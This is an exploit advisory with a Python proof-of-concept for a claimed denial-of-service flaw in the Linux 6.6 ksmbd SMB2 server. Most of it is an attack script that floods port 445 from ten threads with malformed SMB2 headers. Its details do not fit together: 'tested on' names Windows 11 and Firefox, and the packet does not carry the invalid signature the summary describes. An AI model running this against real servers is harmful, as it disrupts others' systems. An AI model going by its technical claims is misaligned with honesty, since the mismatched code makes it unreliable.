=============================================================================================================================================
| # Title     : Linux Kernel 6.6 ksmbd Infinite Loop Denial of Service                                                                      |
| # Author    : indoushka                                                                                                                   |
| # Tested on : windows 11 Fr(Pro) / browser : Mozilla firefox 147.0.4 (64 bits)                                                            |
| # Vendor    : System built in component                                                                                                   |
=============================================================================================================================================

[+] Summary    :  A vulnerability in the Linux kernel’s ksmbd SMB2 server implementation (version 6.6) allows a specially crafted SMB2 request 
                  with an invalid signature to trigger an infinite processing loop inside the kernel worker thread.
                  When signature verification fails inside the request processing routine, the response status is set to STATUS_ACCESS_DENIED, 
				  but the internal pointer tracking the next chained SMB2 command is improperly reset. As a result, the kernel continues reprocessing the same request header indefinitely.

[+] This behavior can lead to:

Sustained high CPU usage

Kernel log flooding (e.g., repeated “bad smb2 signature” messages)

Service degradation or temporary denial of service

The issue affects Linux Kernel 6.6 when the ksmbd module is enabled and exposed over SMB (port 445).

[+] POC   :  

#!/usr/bin/env python3
# -*- coding: utf-8 -*-

import socket
import struct
import threading
import sys

TARGET_IP = "192.168.1.50"  
TARGET_PORT = 445         
THREADS = 10              

def build_malformed_smb2_packet():
    """
    Constructs a specifically malformed SMB2 header.
    By providing an invalid structure size or signature, we trigger 
    error-handling logic in ksmbd that fails to break the processing loop.
    """

    protocol_id = b"\xfeSMB"
    structure_size = struct.pack("<H", 64)  
    padding = b"\xff" * 58 
    
    return protocol_id + structure_size + padding

def attack_worker(thread_id):
    """
    Individual thread worker that attempts to trigger the loop.
    """
    print(f"[*] Thread-{thread_id}: Starting connection to {TARGET_IP}")
    
    while True:
        try:
            s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
            s.settimeout(5)
            s.connect((TARGET_IP, TARGET_PORT))
            packet = build_malformed_smb2_packet()
            s.send(packet)

            data = s.recv(1024) 
        except socket.error:
            break
        finally:
            s.close()

def main():
    if len(sys.argv) > 1:
        global TARGET_IP
        TARGET_IP = sys.argv[1]

    print(f"[!] Targeting: {TARGET_IP} on port {TARGET_PORT}")
    print(f"[*] Deploying {THREADS} threads for PoC...")

    threads_list = []
    for i in range(THREADS):
        t = threading.Thread(target=attack_worker, args=(i,))
        t.start()
        threads_list.append(t)

    for t in threads_list:
        t.join()

if __name__ == "__main__":
    main()
	
Greetings to :==============================================================================
jericho * Larry W. Cashdollar * r00t * Yougharta Ghenai * Malvuln (John Page aka hyp3rlinx)|
============================================================================================